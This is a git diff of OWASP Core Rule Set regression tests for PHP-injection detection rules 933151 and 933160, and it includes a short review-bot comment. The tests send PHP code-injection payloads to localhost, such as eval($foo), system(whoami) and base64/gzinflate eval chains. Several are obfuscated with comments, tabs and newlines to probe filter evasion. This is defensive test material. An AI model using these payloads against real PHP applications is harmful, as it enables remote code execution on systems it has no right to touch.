output: - no_log_contains: id "933151" - - test_title: 933151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=filemtime%28%24foo%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" + - test_id: 4 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "gethostbynamE(" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "gethostbynamE(" + version: "HTTP/1.1" + output: + log_contains: id "933151" + - test_id: 5 desc: "No parenthesis after keyword" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=array_diff" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=array_diff" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" + - test_id: 6 desc: "rule should not trigger when there are other words before parenthesis" stages: 
- - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=ceiling%20height(9ft)" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=ceiling%20height(9ft)" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" + - test_id: 7 desc: "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=preview" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=preview" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" + - test_id: 8 desc: "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 
933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=exploration" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=exploration" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index c3c835a35..986482f94 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml 
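Review bot: After this hunk the meta block no longer says which rule the file exercises — `name: 933151.yaml` is dropped and `description: None` stays as a placeholder string — so a reader has to infer the rule from the `log_contains: id "933151"` assertions and the terse `pmf + chain` descriptions. I'd replace the placeholder with a real one-liner, e.g. `description: "Regression tests for rule 933151: PHP function names from the pmf list, chained to a following parenthesis"` (the chain part is my reading of tests 5 and 6, which expect no match without a parenthesis or with another word before it). With `test_id` now an integer, the `933151-N` names that platform override files key on presumably have to be derived from the file name by the runner; worth confirming that a lookup by `933151-3` still resolves after this change. Minor: test 6 sends `ceiling%20height(9ft)` with raw parentheses while every other test percent-encodes them as `%28`/`%29` — encoding them the same way would make it clear the negative result is about the preceding word, not about the encoding.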
@@ -2,679 +2,640 @@ meta: author: "lifeforms, Franziska Bühler, Max Leske, azurit" description: None - enabled: true - name: 933160.yaml tests: - - test_title: 933160-1 + - test_id: 1 desc: | PHP function call in query. payload: chr(123) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=chr%28123%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=chr%28123%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 2 desc: | PHP function call with variable as parameter. payload: eval($foo) stages: - - stage: - input: - data: eval($foo) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-3 + - input: + data: eval($foo) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 3 desc: | PHP function call, CR, ($variable). 
payload: eval\r($foo) stages: - - stage: - input: - data: eval%0D%28%24foo%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-4 + - input: + data: eval%0D%28%24foo%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 4 desc: | PHP function call, LF, ('value'). payload: exec\n('bar') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%0A%28%27bar%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%0A%28%27bar%27%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 5 desc: | PHP uppercase function call, CR, LF, (). 
payload: FILE\r\n() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FILE%0D%0A%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FILE%0D%0A%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 6 desc: | PHP function call with multiple whitespaces. payload: exec (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 7 desc: | PHP function call using Error Control Operator. 
payload: @exec('test') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=%40exec%28%27test%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=%40exec%28%27test%27%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 8 desc: | PHP function call with vertical tab. payload: exec (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%09%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%09%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 9 desc: | PHP function call with comment and newline. 
payload: exec //comment\r\n (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 10 desc: | PHP function call with comment and newline. payload: exec #comment\r\n (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 11 desc: | PHP function call with comment and newline. 
payload: exec#\n () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%23%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%23%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 12 desc: | PHP function call with comment, newline, and vertical tab. payload: exec \t #\n () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 13 desc: | PHP function call with c-style comment syntax. 
payload: exec/*comment*/() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 14 desc: | PHP function call with c-style comment syntax and whitespaces. payload: exec /*comment*/ () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 15 desc: | PHP function call with empry c-style comment syntax, whitespaces, and vertical tab. 
- payload: exec \t/**/\t () - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-16 + payload: exec /**/ () + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 16 desc: | PHP function call with c-style comment syntax containing newline, whitespaces and vertical tab. payload: exec\t/*foo\r\nbar*/\t () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 17 desc: | PHP function call in URI payload: substr() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/substr()" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/substr()" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 18 desc: | PHP function call in URI, using mixed case payload: subSTR($x) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/subSTR%28%24x%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/subSTR%28%24x%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 19 desc: | PHP function call in URI with concatenated string/functions payload: eval(chr(112).chr(104).chr(112)) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 20 desc: | PHP function call in URI payload: eval(gzinflate(str_rot13(base64_decode("") stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 21 desc: | PHP function call in URI, base64 encoded payload: payload: /eval(base64_decode('cGFwYWRhcHVwaSwK') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 22 desc: 
| PHP function call in body payload: eval("echo 10000000000-245205634;") stages: - - stage: - input: - data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-23 + - input: + data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 23 desc: | PHP function call in body, mixed case payload: eVAl("echo 10000000000-245205634;") stages: - - stage: - input: - data: yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-24 + - input: + data: yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 24 desc: string function call stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=return%22system%22%28xyz%29.s" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=return%22system%22%28xyz%29.s" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 25 desc: | PHP function call payload: system(whoami) stages: - - stage: - input: - data: cmd=system(whoami) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-26 + - input: + data: cmd=system(whoami) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 26 desc: | PHP function call payload: (system)(whoami) stages: - - stage: - input: - data: cmd=(system)(whoami) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-27 + - input: + data: cmd=(system)(whoami) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 27 desc: | PHP function system call in single quotes and parentheses payload: ('system')('whoami') stages: - - stage: - input: - data: cmd=('system')('whoami') - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-28 + - input: + data: cmd=('system')('whoami') + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 28 desc: | PHP system call in double quotes and parentheses payload: ("system")("whoami") stages: - - stage: - input: - data: cmd=("system")("whoami") - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-29 + - input: + data: cmd=("system")("whoami") + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 29 desc: | PHP system call in double quotes and parentheses, multiple spaces after command payload: ("system 
")("whoami") stages: - - stage: - input: - data: cmd=("system ")("whoami") - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-30 + - input: + data: cmd=("system ")("whoami") + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 30 desc: | PHP string function call payload: return"system"(xyz).s stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=return%22system%22%28xyz%29.s" - version: "HTTP/1.1" - output: - 